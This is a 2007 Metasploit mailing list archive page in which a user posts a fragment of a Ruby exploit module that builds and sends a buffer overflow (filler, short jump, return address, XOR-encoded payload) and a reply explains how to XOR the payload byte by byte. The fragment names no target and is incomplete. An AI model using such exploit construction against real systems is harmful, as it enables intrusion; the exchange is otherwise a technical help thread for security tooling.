Metasploit mailing list archives
Need assistance with payload xor
From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 28 Mar 2007 23:29:32 -0700
On Wed, Mar 28, 2007 at 12:52:21PM -0500, ri0t wrote:
    filler = rand_text_english(1) * (target['Offset'])
    jump = [0xeb06eb06].pack("V")
    retadd = [target.ret].pack('V')
    buffer = jump + retadd + payload.encoded
    buffercoded = xor.encode(buffer, [0xb3].pack("V"))
    sploit = header + filler + buffercoded[0]
    sock.put(sploit)
    handler
    disconnect
  end

Unfortunately the xor.encode only XORs the first byte of jump, retadd and payload, not the entire buffer. I am sure it's something I am missing due to a simple lack of Ruby knowledge, but if anyone could point me in the right direction I would be grateful.
Since you're using the Generic XOR, it defaults to using the size of the key as the block size for encoding. I'm guessing what you actually want to do is XOR each individual byte with 0xb3. To do this you should use Rex::Encoding::Xor::Byte. Make sure you use [0xb3].pack("C"). I think this should give you the results you're looking for. If it's still not working let us know.